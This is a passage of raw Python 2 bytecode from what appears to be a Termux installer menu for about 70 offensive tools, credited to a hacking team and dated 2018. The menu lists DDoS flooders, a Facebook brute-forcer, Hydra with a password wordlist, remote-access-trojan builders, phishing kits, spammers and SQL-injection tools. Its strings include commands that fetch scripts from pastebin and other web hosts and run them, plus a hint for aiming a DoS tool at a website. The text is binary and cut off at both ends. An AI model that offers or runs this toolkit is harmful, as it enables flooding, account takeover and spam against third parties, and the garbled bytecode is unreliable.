x00j\x07\x00dE\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dF\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dG\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dH\x01k\x02\x00r\xf8\x14dI\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dJ\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dK\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dL\x01k\x02\x00r_\x15dM\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d6\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dN\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dO\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dP\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dQ\x01k\x02\x00r\xc6\x15dR\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dS\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dT\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dU\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dV\x01k\x02\x00r-\x16dW\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dX\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dY\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dZ\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d[\x01k\x02\x00r\x87\x16d\\\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d]\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d_\x01k\x02\x00r\xe1\x16d`\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00da\x01\x83\x01\x00\x01e\x00\x00j\x07\x00db\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dc\x01k\x02\x00rH\x17dd\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00de\x01\x83\x01\x00\x01e\x00\x00j\x07\x00df\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dg\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01dh\x01GHn\x00\x00e\x14\x00di\x01k\x02\x00r\xa2\x17dj\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dk\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dm\x01k\x02\x00r\xfc\x17dn\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00do\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dp\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dr\x01k\x02\x00rV\x18ds\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dt\x01\x83\x01\x00\x01e\x00\x00j\x07\x00du\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dv\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dw\x01k\x02\x00r\xb0\x18dx\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dy\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dz\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d{\x01k\x02\x00r\n\x19d|\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d}\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d~\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x7f\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x80\x01k\x02\x00rd\x19d\x81\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d-\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x82\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x83\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x84\x01k\x02\x00r\xbe\x19d\x85\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x87\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x88\x01k\x02\x00r%\x1ad\x89\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8a\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8c\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8d\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8e\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x8f\x01k\x02\x00rr\x1ad\x90\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x91\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x92\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x93\x01k\x02\x00r\xbf\x1ad\x94\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x95\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x96\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x97\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x93\x01k\x02\x00r&\x1bd\x98\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x99\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9a\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9d\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x9e\x01k\x02\x00rs\x1bd\x9f\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa0\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa1\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xa2\x01k\x02\x00r\xc0\x1bd\xa3\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa4\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa5\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xa7\x01k\x02\x00r\x1a\x1cd\xa8\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa9\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xaa\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xab\x01k\x02\x00r\x81\x1cd\xac\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xcc\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xad\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xae\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xaf\x01k\x02\x00r\xe8\x1cd\xb0\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb1\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb2\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb3\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xb4\x01k\x02\x00rO\x1dd\xb5\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb6\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb7\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb8\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xb9\x01k\x02\x00r\x9c\x1dd\xba\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d-\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbb\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbc\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xbd\x01k\x02\x00r\xf6\x1dd\xbe\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbf\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc0\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc1\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xc2\x01k\x02\x00s\x0e\x1ee\x14\x00d\xc2\x01k\x02\x00r\x1b\x1ee\x05\x00d\xc3\x01\x83\x01\x00\x01n\x00\x00d\x01\x00S(\xc4\x01\x00\x00i\xff\xff\xff\xffNc\x01\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00sM\x00\x00\x00xF\x00|\x00\x00d\x01\x00\x17D]:\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00t\x06\x00j\x06\x00\x83\x00\x00d\x02\x00\x14\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xb9?(\x07\x00\x00\x00t\x03\x00\x00\x00syst\x06\x00\x00\x00stdoutt\x05\x00\x00\x00writet\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleept\x06\x00\x00\x00random(\x02\x00\x00\x00t\x01\x00\x00\x00st\x01\x00\x00\x00c(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00mengetik\x0f\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x02c\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s/\x00\x00\x00t\x00\x00j\x01\x00}\x00\x00t\x02\x00j\x03\x00|\x00\x00|\x00\x00t\x00\x00j\x04\x00\x8c\x02\x00\x01t\x02\x00j\x05\x00\x83\x00\x00}\x01\x00d\x00\x00S(\x01\x00\x00\x00N(\x06\x00\x00\x00R\x00\x00\x00\x00t\n\x00\x00\x00executablet\x02\x00\x00\x00ost\x05\x00\x00\x00execlt\x04\x00\x00\x00argvt\x06\x00\x00\x00getcwd(\x02\x00\x00\x00t\x06\x00\x00\x00pythont\x06\x00\x00\x00curdir(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x0f\x00\x00\x00restart_program\x15\x00\x00\x00s\x06\x00\x00\x00\x00\x01\t\x01\x16\x01t\x05\x00\x00\x00clears\x04\x00\x00\x00\x1b[0ms\x05\x00\x00\x00\x1b[31ms\x05\x00\x00\x00\x1b[32ms\x08\x00\x00\x00\x1b[01;33ms\x07\x00\x00\x00\x1b[1;34ms\x05\x00\x00\x00\x1b[35ms\x05\x00\x00\x00\x1b[36ms\x05\x00\x00\x00\x1b[37ms\x05\x00\x00\x00\x1b[93ms\x07\x00\x00\x00\x1b[1;91ms\x05\x00\x00\x00\x1b[33ms\xbf\x01\x00\x00 \n :::::::: ::: ::: ::: :::::::: Author : Xeit666h05t\n :+: :+: :+: :+: :+:+: :+: :+: Team : CoiZter_Team\n +:+ +:+ +:+ +:+ +:+ +:+ Support Team : BlackHole Security\n +#+ +#++:++ +#+ +#++:++# Date : 08 April 2K18 \n +#+ +#+ +#+ +#+ +#+ +#+ GreetZ : Takarai Crew - DeadSecTL\n #+# #+# #+# #+# #+# #+# \n########## ### ### ####### ########s\x06\x00\x00\x002K18~#s\x13\x00\x00\x00 [01].Hammer s\x18\x00\x00\x00 [02].Spammer-Grabs\x16\x00\x00\x00 [03].Red Hawk s\x19\x00\x00\x00 [04].Galau Tools s#\x00\x00\x00 [05].Facebook Brute Force s\x14\x00\x00\x00 [06].Webdav s#\x00\x00\x00 [07].Metasploit s\x19\x00\x00\x00 [08].KaliNethunters\x12\x00\x00\x00 [09].Infogas\x12\x00\x00\x00 [10].D-Tects\x11\x00\x00\x00 [11].Hydras\x12\x00\x00\x00 [12].SQLMaps\x14\x00\x00\x00 [13].WFDroid s\x11\x00\x00\x00 [14].viSQLs\x17\x00\x00\x00 [15].The Fat Rats\x17\x00\x00\x00 [16].aircrack-ngs\x14\x00\x00\x00 [17].joomscans\x17\x00\x00\x00 [18].Cms Scanners\x19\x00\x00\x00 [19].IPGeolocations\x18\x00\x00\x00 [20].RouterSploits\x12\x00\x00\x00 [21].Xerxess\x17\x00\x00\x00 [22].Hash-Busters\x14\x00\x00\x00 [23].LITEDDOSs\x1a\x00\x00\x00 [24].HakkuFrameworks\x18\x00\x00\x00 [25].Admin Finders\x13\x00\x00\x00 [26].EvilURLs\x17\x00\x00\x00 [27].AndroZenMaps\x10\x00\x00\x00 [28].Nmaps\x13\x00\x00\x00 [29].Sqlmates\x15\x00\x00\x00 [30].Astranmaps\x0f\x00\x00\x00 [31].WTFs\x13\x00\x00\x00 [32].Easymaps\x10\x00\x00\x00 [33].XD3vs\x11\x00\x00\x00 [34].Cripss\x0f\x00\x00\x00 [35].SIRs\x13\x00\x00\x00 [36].Strikers\x10\x00\x00\x00 [37].DSSSs\x11\x00\x00\x00 [38].SQLivs\x13\x00\x00\x00 [39].SqlScans\x16\x00\x00\x00 [40].Golden Eyes\x11\x00\x00\x00 [41].XGanss\x1b\x00\x00\x00 [42].Planetwork-DDOSs\x14\x00\x00\x00 [43].BlackBoxs\x17\x00\x00\x00 [44].Black Hydras\x14\x00\x00\x00 [45].WPSploits\x13\x00\x00\x00 [46].SqlDumps\x15\x00\x00\x00 [47].WebSploits\x16\x00\x00\x00 [48].Sql Lokmeds\x12\x00\x00\x00 [49].Brutals\x11\x00\x00\x00 [50].A-Rats\x15\x00\x00\x00 [51].KnockMails\x0f\x00\x00\x00 [52].Hacs\x19\x00\x00\x00 [53].Spammer Emails\x12\x00\x00\x00 [54].Rang3rs\x11\x00\x00\x00 [55].SH33Ls\x1e\x00\x00\x00 [56].Social-Engineerings\x15\x00\x00\x00 [57].SpiderBots\x11\x00\x00\x00 [58].Ngroks\x10\x00\x00\x00 [59].Sudos\x12\x00\x00\x00 [60].Ubuntus\x12\x00\x00\x00 [61].Fedoras\x15\x00\x00\x00 [62].XAttackers\x10\x00\x00\x00 [63].VCRTs\x16\x00\x00\x00 [64].SocialFishs\x11\x00\x00\x00 [65].ECodes\x13\x00\x00\x00 [66].Hashzers\x14\x00\x00\x00 [67].XSStrikes\x14\x00\x00\x00 [68].Breachers\x13\x00\x00\x00 [69].PassGens\x13\x00\x00\x00 [70].SpazSMSs\x11\x00\x00\x00 [99].ExitZt\x02\x00\x00\x0001t\x01\x00\x00\x001s\x0e\x00\x00\x00Install Hammers\n\x00\x00\x00pkg updates\x0b\x00\x00\x00pkg upgrades\x12\x00\x00\x00pkg install pythons\x0f\x00\x00\x00pkg install gits)\x00\x00\x00git clone https://github.com/cyweb/hammers\x08\x00\x00\x00Done 0cet\x02\x00\x00\x0002t\x01\x00\x00\x002s\x14\x00\x00\x00Install Spammer-Grabs\x19\x00\x00\x00pkg update && pkg upgrades3\x00\x00\x00git clone https://github.com/p4kl0nc4t/Spammer-Grabt\x02\x00\x00\x0003t\x01\x00\x00\x003s\x14\x00\x00\x00Install RedHawk Euyys\x19\x00\x00\x00apt update && apt upgrades\x0f\x00\x00\x00apt install phps\x0f\x00\x00\x00apt install gits2\x00\x00\x00git clone https://github.com/Tuhinshubhra/RED_HAWKt\x02\x00\x00\x0004t\x01\x00\x00\x004s\x13\x00\x00\x00Install Galau Toolss\x13\x00\x00\x00pkg install python2s8\x00\x00\x00git clone https://github.com/DaffaTakarai/AutoGalauToolst\x02\x00\x00\x0005t\x01\x00\x00\x005s\x1b\x00\x00\x00Install Facebook BruteForces\x17\x00\x00\x00apt install python2-devs\x10\x00\x00\x00apt install wgets\x16\x00\x00\x00pip2 install mechanizes4\x00\x00\x00git clone https://github.com/DaffaTakarai/XEIT_Cybert\x02\x00\x00\x0006t\x01\x00\x00\x006s\x0e\x00\x00\x00Install Webdavs\x12\x00\x00\x00apt install pythons\x1a\x00\x00\x00apt-get install python-pips2\x00\x00\x00pip2 install urllib3 chardet certifi idna requestss\x18\x00\x00\x00apt install openssl curls\x13\x00\x00\x00pkg install libcurls\x0c\x00\x00\x00mkdir webdavs\x0b\x00\x00\x00cd ~/webdavs4\x00\x00\x00wget https://pastebin.com/raw/HnVyQPtR -O webdav.py s\x13\x00\x00\x00chmod 777 webdav.pys\x05\x00\x00\x00cd ~/t\x02\x00\x00\x0007t\x01\x00\x00\x007s\x16\x00\x00\x00Install Metasploit EuysT\x00\x00\x00wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.shs\x14\x00\x00\x00chmod 777 install.shs\r\x00\x00\x00sh install.sht\x02\x00\x00\x0008t\x01\x00\x00\x008s\x15\x00\x00\x00Install KaliNethunters;\x00\x00\x00git clone https://github.com/Hax4us/Nethunter-In-Termux.gits\x18\x00\x00\x00cd ~/Nethunter-In-Termuxs\x17\x00\x00\x00chmod 777 kalinethunters\x10\x00\x00\x00sh kalinethuntert\x01\x00\x00\x009s\x0e\x00\x00\x00Install Infogas5\x00\x00\x00git clone https://github.com/m4ll0k/Infoga.git infogas\t\x00\x00\x00cd infogas\x12\x00\x00\x00pip install -r reqt\x02\x00\x00\x0010s\x0e\x00\x00\x00Install D-Tects\x16\x00\x00\x00apt-get install pythons\x13\x00\x00\x00apt-get install gits;\x00\x00\x00git clone https://github.com/shawarkhanethicalhacker/D-TECTt\x02\x00\x00\x0011s\r\x00\x00\x00Install Hydras!\x00\x00\x00apt update && apt install -y wgets\x11\x00\x00\x00apt install hydrasK\x00\x00\x00wget http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txtt\x02\x00\x00\x0012t\x02\x00\x00\x0013s\x0e\x00\x00\x00Install SqlMaps\x13\x00\x00\x00apt install python2s5\x00\x00\x00git clone https://github.com/sqlmapproject/sqlmap.gits\x0f\x00\x00\x00Install WFDroids\r\x00\x00\x00mkdir wfdroids\x0c\x00\x00\x00cd ~/wfdroidsQ\x00\x00\x00wget https://raw.githubusercontent.com/bytezcrew/wfdroid-termux/master/wfdinstalls\x14\x00\x00\x00chmod 777 wfdinstalls\r\x00\x00\x00sh wfdinstallt\x02\x00\x00\x0014s\r\x00\x00\x00Install viSQLs\n\x00\x00\x00apt updates,\x00\x00\x00git clone https://github.com/blackvkng/viSQLs\x08\x00\x00\x00cd viSQLs*\x00\x00\x00python2 -m pip install -r requirements.txtt\x02\x00\x00\x0015s\x13\x00\x00\x00Install The Fat Rats!\x00\x00\x00apt-get update && apt-get upgrades4\x00\x00\x00git clone https://github.com/Screetsec/TheFatRat.gits\x0c\x00\x00\x00cd TheFatRats\x1f\x00\x00\x00chmod +x setup.sh && ./setup.sht\x02\x00\x00\x0016s\x12\x00\x00\x00Install AirCrak-ngs\x1b\x00\x00\x00apt-get install aircrack-ngt\x02\x00\x00\x0017s\x10\x00\x00\x00Install JoomScans\x14\x00\x00\x00apt-get install perls0\x00\x00\x00git clone https://github.com/rezasp/joomscan.gitt\x02\x00\x00\x0018s\x13\x00\x00\x00Install Cms Scanners/\x00\x00\x00git clone https://github.com/Dionach/CMSmap.gitt\x02\x00\x00\x0019s\x15\x00\x00\x00Install IPGeolocations7\x00\x00\x00git clone https://github.com/maldevel/IPGeolocation.gits\x10\x00\x00\x00cd IPGeolocations\x19\x00\x00\x00chmod +x ipgeolocation.pys\x1f\x00\x00\x00pip install -r requirements.txtt\x02\x00\x00\x0020s\x14\x00\x00\x00Install RouterSploits\x15\x00\x00\x00pip2 install requestss;\x00\x00\x00git clone https://github.com/reverse-shell/routersploit.gits\x0f\x00\x00\x00cd routersploits\x19\x00\x00\x00termux-fix-shebang rsf.pyt\x02\x00\x00\x0021s\x0e\x00\x00\x00Install Xerxess\x11\x00\x00\x00apt install clangs/\x00\x00\x00git clone https://github.com/zanyarjamal/xerxest\x02\x00\x00\x00lss\t\x00\x00\x00cd xerxess\x18\x00\x00\x00clang xerxes.c -o xerxess(\x00\x00\x00Cara Memakainya ./xerxes(nama website)80t\x02\x00\x00\x0022s\x13\x00\x00\x00Install Hash-Busters\x0b\x00\x00\x00apt upgrades8\x00\x00\x00git clone https://github.com/UltimateHackers/Hash-Bustert\x02\x00\x00\x0023s\x10\x00\x00\x00Install LITEDDOSs-\x00\x00\x00git clone https://github.com/4L13199/LITEDDOSt\x02\x00\x00\x0024s\x16\x00\x00\x00Install HakkuFrameworks\n\x00\x00\x00mkdir vasus4\x00\x00\x00git clone https://github.com/4shadoww/hakkuframeworks\x11\x00\x00\x00cd hakkuframeworks\x0e\x00\x00\x00chmod +x hakkut\x02\x00\x00\x0025s\x14\x00\x00\x00Install Admin Finders3\x00\x00\x00git clone https://github.com/Techzindia/admin_penals\x0e\x00\x00\x00cd admin_penals\x1e\x00\x00\x00chmod +x admin_panel_finder.pyt\x02\x00\x00\x0026s\x0f\x00\x00\x00Install EvilURLs\x1f\x00\x00\x00apt install git python2 python3s.\x00\x00\x00git clone https://github.com/UndeadSec/EvilURLs\x0c\x00\x00\x00mv EvilURL ~t\x02\x00\x00\x0027s\x13\x00\x00\x00Install AndroZenMaps\x15\x00\x00\x00apt install nmap curls6\x00\x00\x00curl -O http://override.waper.co/files/androzenmap.txts\x13\x00\x00\x00mkdir ~/AndroZenmaps/\x00\x00\x00mv androzenmap.txt ~/AndroZenmap/androzenmap.sht\x02\x00\x00\x0028s\x0c\x00\x00\x00Install Nmaps\x10\x00\x00\x00apt install nmapt\x02\x00\x00\x0029s\x0f\x00\x00\x00Install Sqlmates\x17\x00\x00\x00apt install python2 gitsA\x00\x00\x00pip2 install mechanize bs4 HTMLparser argparse requests urlparse2s4\x00\x00\x00git clone https://github.com/UltimateHackers/sqlmates\x0c\x00\x00\x00mv sqlmate ~t\x02\x00\x00\x0030s\x11\x00\x00\x00Install Astranmaps\x14\x00\x00\x00apt install git nmaps/\x00\x00\x00git clone https://github.com/Gameye98/AstraNmaps\x0e\x00\x00\x00mv AstraNmap ~t\x02\x00\x00\x0031s\x0b\x00\x00\x00Install WTFs\x17\x00\x00\x00apt install git python2s8\x00\x00\x00pip2 bs4 requests HTMLParser urlparse mechanize argparses&\x00\x00\x00git clone https://github.com/Xi4u7/wtfs\x08\x00\x00\x00mv wtf ~t\x02\x00\x00\x0032s\x08\x00\x00\x00Easy Maps\x13\x00\x00\x00apt install php gits-\x00\x00\x00git clone https://github.com/Cvar1984/Easymaps\x0c\x00\x00\x00mv Easymap ~s\x1d\x00\x00\x00cd ~/Easymap && sh install.sht\x02\x00\x00\x0033s\x0c\x00\x00\x00Install XD3vs\x10\x00\x00\x00apt install curls\x81\x00\x00\x00curl -k -O https://gist.github.com/Gameye98/92035588bd0228df6fb7fa77a5f26bc2/raw/f8e73cd3d9f2a72bd536087bb6ba7bc8baef7d1d/xd3v.shs:\x00\x00\x00mv xd3v.sh ~/../usr/bin/xd3v && chmod +x ~/../usr/bin/xd3vt\x02\x00\x00\x0034s\r\x00\x00\x00Install Cripss1\x00\x00\x00apt install git python2 openssl curl libcurl wgets*\x00\x00\x00git clone https://github.com/Manisso/Cripss\n\x00\x00\x00mv Crips ~t\x02\x00\x00\x0035s\x0b\x00\x00\x00Install SIRs\x18\x00\x00\x00pip2 install bs4 urllib2s-\x00\x00\x00git clone https://github.com/AeonDave/sir.gits\x08\x00\x00\x00mv sir ~t\x02\x00\x00\x0036s\x0f\x00\x00\x00Install Strikers4\x00\x00\x00git clone https://github.com/UltimateHackers/Strikers\x0c\x00\x00\x00mv Striker ~s0\x00\x00\x00cd ~/Striker && pip2 install -r requirements.txtt\x02\x00\x00\x0037s\x0c\x00\x00\x00Install DSSSs*\x00\x00\x00git clone https://github.com/stamparm/DSSSs\t\x00\x00\x00mv DSSS ~t\x02\x00\x00\x0038s\r\x00\x00\x00Install SQLivs+\x00\x00\x00git clone https://github.com/Hadesy2k/sqlivs\n\x00\x00\x00mv sqliv ~t\x02\x00\x00\x0039s\x0f\x00\x00\x00Install SqlScans\x13\x00\x00\x00apt install git phps0\x00\x00\x00git clone http://www.github.com/Cvar1984/sqlscans\x0c\x00\x00\x00mv sqlscan ~t\x02\x00\x00\x0040s\x12\x00\x00\x00Install Golden Eyes-\x00\x00\x00git clone https://github.com/jseidl/GoldenEyes\x0e\x00\x00\x00mv GoldenEye ~t\x02\x00\x00\x0041s\r\x00\x00\x00Install XGanss\x18\x00\x00\x00apt install python2 curls\r\x00\x00\x00mkdir ~/xGanss0\x00\x00\x00curl -O http://override.waper.co/files/xgans.txts\x1d\x00\x00\x00mv xgans.txt ~/xGans/xgans.pyt\x02\x00\x00\x0042s\x17\x00\x00\x00install PlanetWork-DDOSs3\x00\x00\x00git clone https://github.com/Hydra7/Planetwork-DDOSs\x14\x00\x00\x00mv Planetwork-DDOS ~t\x02\x00\x00\x0043s\x10\x00\x00\x00Install BlackBoxs8\x00\x00\x00apt install python2 git && pip2 install optparse passlibs/\x00\x00\x00git clone https://github.com/jothatron/blackboxs\r\x00\x00\x00mv blackbox ~t\x02\x00\x00\x0044s\x13\x00\x00\x00Install Black Hydras\x1d\x00\x00\x00apt install hydra git python2s1\x00\x00\x00git clone https://github.com/Gameye98/Black-Hydras\x10\x00\x00\x00mv Black-Hydra ~t\x02\x00\x00\x0045s\x10\x00\x00\x00Install WPSploits6\x00\x00\x00git clone git clone https://github.com/m4ll0k/wpsploits\r\x00\x00\x00mv wpsploit ~t\x02\x00\x00\x0046s\x0f\x00\x00\x00Install SqlDumps\x13\x00\x00\x00pip2 install googles\x8f\x00\x00\x00curl -k -O https://gist.githubusercontent.com/Gameye98/76076c9a282a6f32749894d5368024a6/raw/6f9e754f2f81ab2b8efda30603dc8306c65bd651/sqldump.pysA\x00\x00\x00mkdir ~/sqldump && chmod +x sqldump.py && mv sqldump.py ~/sqldumpt\x02\x00\x00\x0047s\x11\x00\x00\x00Install WebSploits\x12\x00\x00\x00pip2 install scapys4\x00\x00\x00git clone https://github.com/The404Hacking/websploits\x0e\x00\x00\x00mv websploit ~t\x02\x00\x00\x0048s\x11\x00\x00\x00Install SqlLokmeds\x14\x00\x00\x00pip2 install urllib2s0\x00\x00\x00git clone https://github.com/Anb3rSecID/sqlokmeds\r\x00\x00\x00mv sqlokmed ~t\x02\x00\x00\x0049s\x0e\x00\x00\x00Install Brutals-\x00\x00\x00git clone https://github.com/Screetsec/Brutals\x0b\x00\x00\x00mv Brutal ~t\x02\x00\x00\x0050s\r\x00\x00\x00Install A-Rats(\x00\x00\x00git clone https://github.com/Xi4u7/A-Rats\n\x00\x00\x00mv A-Rat 